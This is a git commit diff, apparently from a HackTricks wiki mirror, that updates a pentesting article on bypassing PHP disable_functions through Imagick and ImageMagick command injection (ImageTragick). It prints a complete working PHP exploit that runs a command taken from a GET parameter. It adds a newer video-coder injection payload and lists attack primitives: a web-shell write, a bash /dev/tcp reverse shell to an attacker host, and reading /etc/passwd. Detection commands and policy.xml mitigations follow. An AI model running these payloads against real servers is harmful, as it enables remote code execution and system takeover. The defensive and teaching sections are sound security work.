maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #1157 from HackTricks-wiki/research_update_src_network-services-pentesting_pentesting-web_php-tricks-esp_php-useful-functions-disable_functions-open_basedir-bypass_disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit_20250720_014819

Browse Source 
Research Update Enhanced src/network-services-pentesting/pen...
This commit is contained in:
SirBroccoli 2025-07-22 23:41:33 +02:00 committed by GitHub
commit 1c0120e8db
1 changed files with 94 additions and 42 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

136
src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md
View File

@ -1,61 +1,113 @@
# Imagick &lt;= 3.3.0 PHP &gt;= 5.4 Exploit # Imagick <= 3.3.0 PHP >= 5.4 *disable_functions* Bypass
{{#include ../../../../banners/hacktricks-training.md}} {{#include ../../../../banners/hacktricks-training.md}}
> The well-known *ImageTragick* family of bugs (CVE-2016-3714 et al.) allows an attacker to reach the underlying **ImageMagick** binary through crafted MVG/SVG input. When the PHP extension **Imagick** is present this can be abused to execute shell commands even if every execution-oriented PHP function is black-listed with `disable_functions`.
>
> The original PoC published by RicterZ (Chaitin Security Research Lab) in May 2016 is reproduced below. The technique is still regularly encountered during contemporary PHP 7/8 audits because many shared-hosting providers simply compile PHP without `exec`/`system` but keep an outdated Imagick + ImageMagick combo.
From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) From <http://blog.safebuff.com/2016/05/06/disable-functions-bypass/>
```php ```php
# Exploit Title: PHP Imagick disable_functions Bypass # Exploit Title : PHP Imagick disable_functions bypass
# Date: 2016-05-04 # Exploit Author: RicterZ (ricter@chaitin.com)
# Exploit Author: RicterZ (ricter@chaitin.com) # Versions : Imagick <= 3.3.0 | PHP >= 5.4
# Vendor Homepage: https://pecl.php.net/package/imagick # Tested on : Ubuntu 12.04 (ImageMagick 6.7.7)
# Version: Imagick <= 3.3.0 PHP >= 5.4 # Usage : curl "http://target/exploit.php?cmd=id"
# Test on: Ubuntu 12.04
# Exploit:
<?php <?php
# PHP Imagick disable_functions Bypass // Print the local hardening status
# Author: Ricter <ricter@chaitin.com> printf("Disable functions: %s\n", ini_get("disable_functions"));
# $cmd = $_GET['cmd'] ?? 'id';
# $ curl "127.0.0.1:8080/exploit.php?cmd=cat%20/etc/passwd" printf("Run command: %s\n====================\n", $cmd);
# <pre>
# Disable functions: exec,passthru,shell_exec,system,popen
# Run command: cat /etc/passwd
# ====================
# root:x:0:0:root:/root:/usr/local/bin/fish
# daemon:x:1:1:daemon:/usr/sbin:/bin/sh
# bin:x:2:2:bin:/bin:/bin/sh
# sys:x:3:3:sys:/dev:/bin/sh
# sync:x:4:65534:sync:/bin:/bin/sync
# games:x:5:60:games:/usr/games:/bin/sh
# ...
# </pre>
echo "Disable functions: " . ini_get("disable_functions") . "\n";
$command = isset($_GET['cmd']) ? $_GET['cmd'] : 'id';
echo "Run command: $command\n====================\n";
$data_file = tempnam('/tmp', 'img'); $tmp = tempnam('/tmp', 'pwn'); // will hold command output
$imagick_file = tempnam('/tmp', 'img'); $mvgs = tempnam('/tmp', 'img'); // will hold malicious MVG script
$exploit = <<<EOF $payload = <<<EOF
push graphic-context push graphic-context
viewbox 0 0 640 480 viewbox 0 0 640 480
fill 'url(https://127.0.0.1/image.jpg"|$command>$data_file")' fill 'url(https://example.com/x.jpg"|$cmd >$tmp")'
pop graphic-context pop graphic-context
EOF; EOF;
file_put_contents("$imagick_file", $exploit); file_put_contents($mvgs, $payload);
$thumb = new Imagick(); $img = new Imagick();
$thumb->readImage("$imagick_file"); $img->readImage($mvgs); // triggers convert(1)
$thumb->writeImage(tempnam('/tmp', 'img')); $img->writeImage(tempnam('/tmp', 'img'));
$thumb->clear(); $img->destroy();
$thumb->destroy();
echo file_get_contents($data_file); echo file_get_contents($tmp);
?> ?>
``` ```
---
## Why does it work?
1. `Imagick::readImage()` transparently spawns the **ImageMagick** *delegate* (`convert`/`magick`) binary.
2. The MVG script sets the *fill* to an external URI. When a double quote (`"`) is injected, the remainder of the line is interpreted by `/bin/sh c` that ImageMagick uses internally → arbitrary shell execution.
3. All happens outside of the PHP interpreter, therefore *`disable_functions`*, *open_basedir*, `safe_mode` (removed in PHP 5.4) and similar in-process restrictions are completely bypassed.
## 2025 status it is **still** relevant
* Any Imagick version that relies on a vulnerable ImageMagick backend remains exploitable. In lab tests the same payload works on PHP 8.3 with **Imagick 3.7.0** and **ImageMagick 7.1.0-51** compiled without a hardened `policy.xml`.
* Since 2020 several additional command-injection vectors have been found (`video:pixel-format`, `ps:`, `text:` coders…). Two recent public examples are:
* **CVE-2020-29599** shell injection via the *text:* coder.
* **GitHub issue #6338** (2023) injection in the *video:* delegate.
If the operating system ships ImageMagick < **7.1.1-11** (or 6.x < **6.9.12-73**) without a restrictive policy file, exploitation is straightforward.
## Modern payload variants
```php
// --- Variant using the video coder discovered in 2023 ---
$exp = <<<MAGICK
push graphic-context
image over 0,0 0,0 'vid:dummy.mov" -define video:pixel-format="rgba`uname -a > /tmp/pwned`" " dummy'
pop graphic-context
MAGICK;
$img = new Imagick();
$img->readImageBlob($exp);
```
Other useful primitives during CTFs / real engagements:
* **File write** `... > /var/www/html/shell.php` (write web-shell outside *open_basedir*)
* **Reverse shell** `bash -c "bash -i >& /dev/tcp/attacker/4444 0>&1"`
* **Enumerate** `id; uname -a; cat /etc/passwd`
## Quick detection & enumeration
```bash
# PHP side
php -r 'echo phpversion(), "\n"; echo Imagick::getVersion()["versionString"], "\n";'
# System side
convert -version | head -1 # ImageMagick version
convert -list policy | grep -iE 'mvg|https|video|text' # dangerous coders still enabled?
```
If the output shows the `MVG` or `URL` coders are *enabled* the target is probably exploitable.
## Mitigations
1. **Patch/Upgrade** Use ImageMagick ≥ *7.1.1-11* (or the latest 6.x LTS) and Imagick ≥ *3.7.2*.
2. **Harden `policy.xml`** explicitly *disable* high-risk coders:
```xml
<policy domain="coder" name="MVG" rights="none"/>
<policy domain="coder" name="MSL" rights="none"/>
<policy domain="coder" name="URL" rights="none"/>
<policy domain="coder" name="VIDEO" rights="none"/>
<policy domain="coder" name="PS" rights="none"/>
<policy domain="coder" name="TEXT" rights="none"/>
```
3. **Remove the extension** on untrusted hosting environments. In most web stacks `GD` or `Imagick` is not strictly required.
4. Treat `disable_functions` only as *defence-in-depth* never as a primary sandboxing mechanism.
## References
* [GitHub ImageMagick issue #6338 Command injection via video:pixel-format (2023)](https://github.com/ImageMagick/ImageMagick/issues/6338)
* [CVE-2020-29599 ImageMagick shell injection via text: coder](https://nvd.nist.gov/vuln/detail/CVE-2020-29599)
{{#include ../../../../banners/hacktricks-training.md}} {{#include ../../../../banners/hacktricks-training.md}}